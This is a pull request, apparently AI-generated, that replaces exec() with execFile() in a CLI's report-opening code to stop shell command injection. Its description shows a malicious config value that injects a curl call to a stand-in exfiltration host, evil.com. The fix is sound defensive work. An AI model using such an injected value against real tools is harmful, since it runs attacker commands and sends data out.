### PR TITLE
fix: replace exec() with execFile() to prevent command injection

### DIFF
--- a/src/index.ts
+++ b/src/index.ts
@@ -427,9 +427,9 @@ async function main() {
     console.log(` ${outputDirName}/report.html`);
 
     if (doOpen) {
-      const { exec } = await import("node:child_process");
+      const { execFile } = await import("node:child_process");
       const cmd = process.platform === "darwin" ? "open" : process.platform === "win32" ? "start" : "xdg-open";
-      exec(`${cmd} "${reportPath}"`);
+      execFile(cmd, [reportPath]);
       console.log("  Opening in browser...");
     }
   }


### PR DESCRIPTION
## Summary

- Replaces `child_process.exec()` with `execFile()` in the `--open` code path (`src/index.ts:430-432`)
- `exec()` spawns a shell and interpolates `reportPath` into the command string, allowing shell metacharacter injection
- `execFile()` passes arguments as an array without a shell, eliminating the injection vector

## Security issue

A malicious `codesight.config.json` (or `.js`/`.ts`) with a crafted `outputDir` value can inject arbitrary shell commands when a user runs `npx codesight --open`. For example:

```json
{ "outputDir": "x\"; curl http://evil.com/exfil #" }
```

This causes `exec('open "/<path>/x"; curl http://evil.com/exfil #/report.html"')` to execute the injected command.

## Test plan

- [x] `npx tsc` compiles without errors
- [ ] `npx codesight --open` still opens the HTML report in browser on macOS/Linux

🤖 Generated with [Claude Code](https://claude.com/claude-code)